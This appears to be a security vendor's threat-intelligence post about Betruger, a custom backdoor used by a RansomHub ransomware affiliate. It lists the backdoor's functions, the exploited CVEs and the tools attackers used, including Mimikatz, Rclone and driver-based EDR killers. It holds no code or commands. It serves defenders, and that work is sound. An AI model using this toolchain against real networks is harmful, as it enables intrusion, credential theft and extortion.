RansomHub: Attackers Leverage New Custom Backdoor

At least one affiliate of the RansomHub ransomware-as-a-service (RaaS) has begun using a new custom backdoor in attacks. The malware (Backdoor.Betruger) is a rare example of a multi-function backdoor, seemingly developed specifically for use in carrying out ransomware attacks. 

The use of custom malware other than encrypting payloads is relatively unusual in ransomware attacks. Most attackers rely on legitimate tools, living off the land, and publicly available malware such as Mimikatz and Cobalt Strike. Ransomware groups do on occasion develop custom tools, mostly for data exfiltration, such as the Coreid group’s Infostealer.Exmatter or the Hecamede group’s Infostealer.Exbyte.

Betruger functionality

Analysis of the Betruger backdoor revealed that it contained functionality that is usually found in multiple pre-ransomware tools. This included:

• Screenshotting
• Keylogging
• Uploading files to a command and control (C&C) server
• Network scanning
• Privilege escalation
• Credential dumping 

File names used for versions of this malware included mailer.exe and turbomailer.exe. The backdoor contains no mailing functionality. It is possible the attackers used the name in order to masquerade as a legitimate application. 

The functionality of Betruger indicates that it may have been developed in order to minimize the number of new tools dropped on a targeted network while a ransomware attack is being prepared. 

Other tools

Betruger is just one of a range of tools that have been used by RansomHub affiliates in recent months. Like a growing number of ransomware attackers, some have begun using tools that leverage the Bring Your Own Vulnerable Driver (BYVOD) technique to disable security solutions, most notably EDRKillshifter. 

Attackers also leveraged several vulnerabilities, including a Windows Privilege Escalation exploit (CVE-2022-24521) and a Veeam exploit that leaks credentials for backups (CVE-2023-27532). 

Other tools leveraged in recent attacks include: 

• Impacket: An open-source collection of modules written in Python for programmatically constructing and manipulating network protocols. Impacket contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.
• Stowaway Proxy Tool: A publicly available multi-hop proxy tool that allows users to easily proxy their network traffic to intranet nodes.
• Rclone: An open-source tool that can legitimately be used to manage content in the cloud, but has been seen being abused by ransomware actors to exfiltrate data from victim machines.
• ScreenConnect: A remote desktop application tool by ConnectWise, used to enable remote access to computers.
• Mimikatz: A publicly available credential dumping tool.
• SystemBC: Commodity malware that can open a backdoor on the infected computer and use the SOCKS5 proxy protocol to communicate with a C&C server.
• NetScan: SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for the discovery of host names and network services.
• Atera: Legitimate remote monitoring and access software. It and similar tools are often used by attackers to obtain remote access to computers on a network.
• Splashtop: A family of legitimate remote desktop software and remote support software developed by Splashtop Inc. Enables users to remotely access computers from desktop and mobile devices.
• TightVNC: Open-source remote desktop software.

Up-and-coming threat

The Betruger backdoor was deployed in several recent RansomHub attacks, suggesting that it is available to at least one affiliate. RansomHub is a RaaS operation run by a cybercrime group Symantec calls Greenbottle. Active since February 2024, Greenbottle has quickly grown RansomHub, becoming the most prolific ransomware operation by the third quarter of 2024, responsible for the highest number of claimed attacks. The group has reportedly won over many affiliates by offering them better terms compared to rival operations, such as a great percentage of ransom payments and a payment model where the affiliate is paid by the victim before passing on the operator’s cut.

Protection/Mitigation

For the latest protection updates, please visit the Symantec Protection Bulletin.

Indicators of Compromise

If an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.